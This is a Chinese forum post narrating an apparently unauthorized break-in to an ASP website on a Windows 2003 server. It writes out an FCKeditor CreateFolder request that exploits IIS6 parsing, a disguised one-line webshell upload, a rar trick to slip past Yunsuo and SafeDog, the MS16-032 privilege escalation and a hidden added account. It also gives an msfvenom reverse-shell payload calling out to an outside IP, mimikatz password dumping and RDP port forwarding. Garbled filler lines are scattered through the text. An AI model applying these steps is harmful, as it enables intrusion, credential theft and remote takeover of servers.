|
# Q0 x+ g6 K& g1 S
- I( ], W, X% e
4 i) ^( O: X- w5 X# S( ?
N8 g: j, X+ S |
5 P2 a& p( g7 l3 J; Z, G , f* i5 X# n4 Q+ C7 _* W
J; M; c3 K1 S$ r: f一、 利用getwebshell篇
9 h; n; F1 Y6 F/ o2 Z, C2 A
) ~& z# X3 ~3 B8 E; }首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
8 |4 ?$ H5 s% i* w
( Z/ _6 ^/ L! A4 b9 u* Z" H
7 y4 V7 a/ q& ]. B下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
! L3 s9 L5 @$ t! V, D# H4 M6 q1 \
* `- J' Y9 X4 g( x$ J2 z* L下面我们构造一个asp目录,如: . R' d' M% ]5 f2 a9 C& V# o3 z0 `
& Y7 c5 o8 n+ F8 O/ ?
, R7 G" v) y/ [ http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
) r; h, ^- h4 f8 ?2 u
1 q8 v' W+ q8 E
6 s1 t7 w# R$ @3 H( U0 M 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
6 t9 c- V& h O: w; w3 g" E& G, U
^% |5 O7 f4 t. ]& t0 y. q一、 绕过安全狗云锁提权并且加账号
. Z& f+ `. K7 J3 T9 |& S+ a
3 D8 Z$ c/ ~) C) _没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
; o+ a" _7 t4 c
$ d: E$ t, \7 f4 K6 G8 Q+ s6 R% l
如图:
. Q' m5 X$ R/ m& h, o, \6 p6 K
5 W; p* G8 V7 V' |9 ~$ a) L然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
# `* ^1 ~2 p, {: i/ \+ R1 c
+ g4 l0 w. G5 \8 Q) J$ ^一、 利用metasploit
) i I4 ^+ O) q5 A5 ~( @2 R# y
, Y- S+ w8 j9 o
首先用pentestbox生成一个64位的payload如下命令
. ~! d- W. r- {1 _+ a
5 L4 ?! H7 }& P3 T. F4 KmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
/ }' ^: Q3 @! {4 p
- V$ c! Z1 c K% K! ?为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
5 y7 G! v+ @8 J8 ^* x4 e/ |
7 d+ n G% M# K! P: ]6 ^3 S: [0 E
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
7 s. d0 R6 L" O0 N d' o
; R- C- j( E: u下面我们来做一个监听如下命令:
6 v- C8 l8 d* ^
/ ]6 W/ E" w6 Z2 I6 S
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
. R$ f5 J2 f: P( I, [( S
 ! ?* x' [& E' y8 N% V# q, J& A
; H& `. }: ^6 M6 ^8 {9 y/ C |
* J$ ^$ ~% X' U2 F+ I & Z! d% _' g% t* E
: M( c/ o1 n& X* g: p ' U+ e: T* }1 M: T c; w
* B% j4 _( @$ g- z3 A6 ~) j
# [: q+ A7 T# G6 T7 {
3 C( a0 x: f) P& B
s: F. P. \; C
/ N) d( q L4 G; ? y8 T6 O/ E ( W9 n/ V/ D9 W2 [7 b1 s7 ~
8 L! ]0 I1 X3 b& F' l- b
+ B9 S6 @6 {) e
$ f1 }# E( M: ~) h
, ~4 B5 E! b0 x/ Y8 c | 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06